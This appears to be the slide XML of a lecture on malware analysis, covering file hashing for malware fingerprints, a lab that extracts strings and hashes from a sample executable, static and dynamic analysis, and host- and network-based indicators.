                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://scholar.google.com.vn/citations?hl=en&amp;user=zC4vaRAAAAAJ</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Google Shape;110;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915816" y="4905003"/>
            <a:ext cx="2407816" cy="1805862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Google Shape;111;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5383265" y="1421497"/>
            <a:ext cx="2868692" cy="2151519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;112;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436096" y="4607605"/>
            <a:ext cx="1715150" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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MATLAB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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Firewall</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="18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Li-Fi</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0"/>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Hash Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p30"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Check the integrity of a file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Unique hash value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Common hash functions: MD-5, SHA-256</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> - A Fingerprint (or Signature) for malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Share generated hash with other analysts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Search for generated hash on-line to see if the file has already identified</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>HashCal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>md5deep</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="28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1"/>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Practice</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Google Shape;360;p31"/>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Files: Lab01-01.exe (or any malware file)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Identify</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strings: guess the purpose of the malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hash: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>MD5</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SHA-1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>SHA-256</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Write a piece of code to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Detect strings contained in a PE file</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Generate MD-5, SHA-256 code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="28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2"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="367" name="Google Shape;367;p32"/>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The process of investigating the behaviour of a specific sample of malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>To determine exactly what a particular suspect binary code can do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How to detect it on the network</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>How to measure and contain its damage </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Can be used to develop indicators /signatures:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Host-based indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: are used to detect malicious code on victim computers.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Network-based indicators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>: are used to detect malicious code by monitoring network traffic.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="30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3"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Google Shape;373;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5364" y="2997508"/>
            <a:ext cx="3774547" cy="3743860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p33"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;375;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755576" y="1268760"/>
            <a:ext cx="6402932" cy="2017182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737022" y="3429000"/>
            <a:ext cx="4031168" cy="2585323"/>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u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Success</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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No threats found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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Sample found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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New threats found</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="28575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800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Failure</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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Complex obfuscation techniques used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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Lack of time, resources</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="0" marL="285750" marR="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File sample is not prioritised</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516216" y="2261445"/>
            <a:ext cx="1584176" cy="1400061"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16200000" name="adj1"/>
              <a:gd fmla="val 101169" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="2857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378" name="Google Shape;378;p33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="377" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8099953" y="2984779"/>
            <a:ext cx="300" cy="325800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="4A7DBA"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="med" w="med" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771800" y="1484784"/>
            <a:ext cx="3600400" cy="360040"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16200000" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="4A7DBA"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="non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0" name="Google Shape;380;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627784" y="1484784"/>
            <a:ext cx="3888432" cy="360040"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd fmla="val 16200000" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:no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4"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p34"/>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Surface Analysis (Scanning)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: recognizing or discovering a malware signature (i.e. opening the sample and quickly search for information in the sample file without executing it).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="387" name="Google Shape;387;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="655842" y="3284984"/>
            <a:ext cx="8020614" cy="219645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5"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p35"/>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Dynamic Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: mainly of running the target sample and gathering diagnostics and behaviour results based on logs and monitoring tools.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Google Shape;394;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907704" y="2564904"/>
            <a:ext cx="5832574" cy="425178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6"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p36"/>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Behaviours</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Mainly processes run, with threads. Shows what processes are spawned and with which commands.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
